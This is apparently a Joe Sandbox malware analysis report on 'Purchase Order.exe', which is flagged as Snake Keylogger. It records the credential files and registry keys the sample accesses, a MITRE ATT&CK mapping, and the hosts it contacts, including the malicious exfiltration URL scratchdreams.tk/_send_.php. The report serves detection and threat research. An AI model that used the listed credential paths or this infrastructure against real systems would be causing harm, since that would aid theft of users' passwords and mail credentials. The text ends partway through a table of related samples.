            Source: Yara matchFile source: 0.2.Purchase Order.exe.454b488.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.456bca8.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.454b488.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.4124971142.00000000034A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1733547969.000000000447E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4124971142.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 6576, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 7048, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 0.2.Purchase Order.exe.456bca8.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.454b488.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.456bca8.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.454b488.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1733547969.000000000447E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 6576, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 7048, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 0.2.Purchase Order.exe.456bca8.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.454b488.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.456bca8.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.454b488.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.4124971142.00000000034A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1733547969.000000000447E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4124971142.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 6576, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 7048, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		111
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		1
            Query Registry            		Remote Services1
            Email Collection            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Disable or Modify Tools            		LSASS Memory1
            Security Software Discovery            		Remote Desktop Protocol11
            Archive Collected Data            		1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		1
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
            Process Injection            		NTDS31
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeylogging23
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information            		Cached Domain Credentials1
            System Network Configuration Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Software Packing            		DCSync13
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Timestomp            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Purchase Order.exe24%ReversingLabs
            Purchase Order.exe100%AviraHEUR/AGEN.1309278
            Purchase Order.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.tiro.com0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            http://checkip.dyndns.org/q0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://reallyfreegeoip.org0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://checkip.dyndns.com0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            http://www.founder.com.cn/cn0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
            http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
            https://scratchdreams.tk/_send_.php?TS100%Avira URL Cloudmalware
            http://scratchdreams.tk100%Avira URL Cloudmalware
            https://scratchdreams.tk100%Avira URL Cloudmalware
            https://reallyfreegeoip.org/xml/102.129.152.231$0%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/102.129.152.2310%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            us2.smtp.mailhostbox.com
            		208.91.199.224
            		truefalse
              		high
              reallyfreegeoip.org
              		104.21.67.152
              		truefalse
                		unknown
                scratchdreams.tk
                		104.21.27.85
                		truefalse
                  		unknown
                  checkip.dyndns.com
                  		132.226.247.73
                  		truefalse
                    		unknown
                    checkip.dyndns.org
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://checkip.dyndns.org/false
                      • URL Reputation: safe
                      		unknown
                      https://scratchdreams.tk/_send_.php?TSfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://reallyfreegeoip.org/xml/102.129.152.231false
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.0Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.comPurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersGPurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bThePurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://us2.smtp.mailhostbox.comPurchase Order.exe, 00000002.00000002.4124971142.00000000034A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers?Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.tiro.comPurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://checkip.dyndns.orgPurchase Order.exe, 00000002.00000002.4124971142.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.000000000338E000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003357000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000033AD000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003365000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003373000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003303000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003380000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designersPurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.goodfont.co.krPurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.comlPurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sajatypeworks.comPurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.typography.netDPurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNPurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/cThePurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmPurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cnPurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/frere-user.htmlPurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://checkip.dyndns.org/qPurchase Order.exe, 00000000.00000002.1733547969.000000000447E000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.jiyu-kobo.co.jp/Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://scratchdreams.tkPurchase Order.exe, 00000000.00000002.1733547969.000000000447E000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003201000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000033CA000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://reallyfreegeoip.orgPurchase Order.exe, 00000002.00000002.4124971142.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003357000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000033AD000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003365000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003373000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003380000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/DPleasePurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://reallyfreegeoip.orgPurchase Order.exe, 00000002.00000002.4124971142.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003357000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000033AD000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003365000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003373000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003303000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003380000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fonts.comPurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krPurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://checkip.dyndns.comPurchase Order.exe, 00000002.00000002.4124971142.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003357000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000033AD000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003365000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003373000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003380000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleasePurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cnPurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePurchase Order.exe, 00000002.00000002.4124971142.0000000003201000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.sakkal.comPurchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000000.00000002.1736293448.0000000005C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://reallyfreegeoip.org/xml/102.129.152.231$Purchase Order.exe, 00000002.00000002.4124971142.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003357000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000033AD000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003365000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003373000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003303000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003380000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://scratchdreams.tkPurchase Order.exe, 00000002.00000002.4124971142.00000000033CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://reallyfreegeoip.org/xml/Purchase Order.exe, 00000000.00000002.1733547969.000000000447E000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              104.21.67.152
                                              		reallyfreegeoip.orgUnited States
                                              		13335CLOUDFLARENETUSfalse
                                              208.91.199.224
                                              		us2.smtp.mailhostbox.comUnited States
                                              		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                              104.21.27.85
                                              		scratchdreams.tkUnited States
                                              		13335CLOUDFLARENETUSfalse
                                              132.226.247.73
                                              		checkip.dyndns.comUnited States
                                              		16989UTMEMUSfalse

                                              General Information

                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1420259
                                              Start date and time:2024-04-04 16:33:11 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 39s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:7
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:Purchase Order.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@3/1@4/4
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 254
                                              • Number of non-executed functions: 72
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • VT rate limit hit for: Purchase Order.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              16:34:03API Interceptor11206013x Sleep call for process: Purchase Order.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              104.21.67.152Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                1d4D5ndo0x.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                  D09876500900000H.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                    23343100IM00270839_Dekont1.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      Payment_Draft_confirmation.xla.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                                        e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          proforma_Invoice_0009300_74885959969_9876.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            ATM Dekont E-Maili pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              Q88 09284823910.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                SecuriteInfo.com.Trojan.PackedNET.2725.8730.30889.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  208.91.199.224Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    Dhl 984857.exeGet hashmaliciousAgentTeslaBrowse
                                                                      Dhl 0393837.exeGet hashmaliciousAgentTeslaBrowse
                                                                        DHL Waybill & Shipping Documents.exeGet hashmaliciousAgentTeslaBrowse
                                                                          Quotation - HDPE Fittings.exeGet hashmaliciousAgentTeslaBrowse
                                                                            CV Mariana Alvarez.exeGet hashmaliciousAgentTeslaBrowse
                                                                              DHL9407155789.exeGet hashmaliciousAgentTeslaBrowse
                                                                                FedEx Receipt_239017170.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  DHL9407155789.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    H760 MH POTENCIA SUPERIOR.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      104.21.27.85Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          FGT5000800000.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                            PT98765445670009.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              8wvP84hzFu.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  ATM Dekont E-Maili pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                    Halkbank_Ekstre_20240312_081829_752731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      Q88 09284823910.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        SecuriteInfo.com.Trojan.PackedNET.2725.1552.3502.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          132.226.247.73Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          8wvP84hzFu.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          Payment_Draft_confirmation.xla.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          xdd6BRIg0O.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          Mquqdysqqv.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          SecuriteInfo.com.Trojan.PackedNET.2725.19533.14530.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          Vessel Particulars.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          MT Ramona Particulars.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          SecuriteInfo.com.Win32.TrojanX-gen.9014.19757.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          SecuriteInfo.com.Win32.TrojanX-gen.12091.2695.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/

                                                                                                          Domains

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          checkip.dyndns.comPurchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 193.122.130.0
                                                                                                          lxdriver_setup.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                                                          • 158.101.44.242
                                                                                                          iCareFone.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                                                          • 193.122.130.0
                                                                                                          Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 193.122.6.168
                                                                                                          1d4D5ndo0x.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                          • 193.122.6.168
                                                                                                          FGT5000800000.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          D09876500900000H.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                          • 193.122.130.0
                                                                                                          z52OURO08765.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          Quark Browser.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                                                          • 193.122.130.0
                                                                                                          scratchdreams.tkPurchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.27.85
                                                                                                          Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 172.67.169.18
                                                                                                          109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.27.85
                                                                                                          1d4D5ndo0x.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                          • 172.67.169.18
                                                                                                          FGT5000800000.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                          • 104.21.27.85
                                                                                                          D09876500900000H.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                          • 172.67.169.18
                                                                                                          z52OURO08765.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
